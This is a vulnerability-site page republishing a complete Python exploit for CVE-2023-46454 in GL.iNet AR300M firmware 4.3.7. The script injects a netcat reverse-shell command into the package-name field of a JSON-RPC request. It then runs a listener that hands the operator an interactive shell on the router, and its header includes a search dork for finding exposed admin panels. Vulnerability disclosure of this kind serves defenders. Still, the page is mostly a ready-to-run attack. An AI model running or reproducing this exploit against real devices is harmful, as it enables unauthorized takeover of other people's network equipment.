Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

GL.iNet AR300M 4.3.7 Remote Code Execution

Related Vulnerabilities: CVE-2023-46454  
Publish Date: 04 Mar 2024
Author: Michele Di Bonaventura
Source 
                							

                #!/usr/bin/env python3

# Exploit Title: GL.iNet <= 4.3.7 Remote Code Execution via OpenVPN Client
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: XX/11/2023
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://www.gli-net.com
# Software Link: https://fw.gl-inet.com/firmware/ar300m/nand/release4/openwrt-ar300m-4.3.7-0913-1694589403.tar
# Version: 4.3.7
# Tested on: GL.iNet AR300M
# CVE: CVE-2023-46454

import socket
import requests
import readline
from time import sleep
from random import randint
from sys import stdout, argv
from threading import Thread

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def trigger_revshell(url, auth_token, payload):
  sleep(0.25)
  data = {
    'jsonrpc': '2.0',
    'id': randint(1000, 9999),
    'method': 'call',
    'params': [
      auth_token,
      'plugins',
      'get_package_info',
      {'name': 'bas{}e-files'.format(payload)}
    ]
  }
  requests.post(url, json=data, verify=False)

def get_command_response(s):
  res = ''
  while True:
    try:
      resp = s.recv(1).decode('utf-8')
      res += resp
    except UnicodeDecodeError:
      pass
    except socket.timeout:
      break
  return res

def revshell_listen(revshell_ip, revshell_port):
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.settimeout(5)

  try:
    s.bind((revshell_ip, int(revshell_port)))
    s.listen(1)
  except Exception as e:
    print('[X] Exception "{}" encountered while binding reverse shell'.format(type(e).__name__))
    exit(1)

  try:
    clsock, claddr = s.accept()
    clsock.settimeout(2)
    if clsock:
      print('[+] Incoming reverse shell connection from {}:{}, enjoy ;)'.format(claddr[0], claddr[1]))
      res = ''
      while True:
        command = input('$ ')
        clsock.sendall('{}\n'.format(command).encode('utf-8'))
        stdout.write(get_command_response(clsock))

  except socket.timeout:
    print('[-] No connection received in 5 seconds, probably server is not vulnerable...')
    s.close()

  except KeyboardInterrupt:
    print('\n[*] Closing connection')
    try:
      clsock.close()
    except socket.error:
      pass
    except NameError:
      pass
    s.close()

def main(base_url, auth_token, revshell_ip, revshell_port):
  print('[+] Started GL.iNet <= 4.3.7 RCE exploit')

  payload = '$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {} {} >/tmp/f)'.format(revshell_ip, revshell_port)
  print('[+] Reverse shell payload: "{}"'.format(payload))

  print('[*] Triggering reverse shell connection')
  Thread(target=trigger_revshell, args=(base_url+'/rpc', auth_token, payload)).start()

  print('[*] Starting reverse shell on {}:{}'.format(revshell_ip, revshell_port))
  revshell_listen(revshell_ip, revshell_port)

  print('[+] Done')

if __name__ == '__main__':
  if len(argv) < 5:
    print('Usage: {} <TARGET_URL> <AUTH_TOKEN> <REVSHELL_IP> <REVSHELL_PORT>'.format(argv[0]))
    exit(1)

  main(argv[1], argv[2], argv[3], argv[4])
            

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started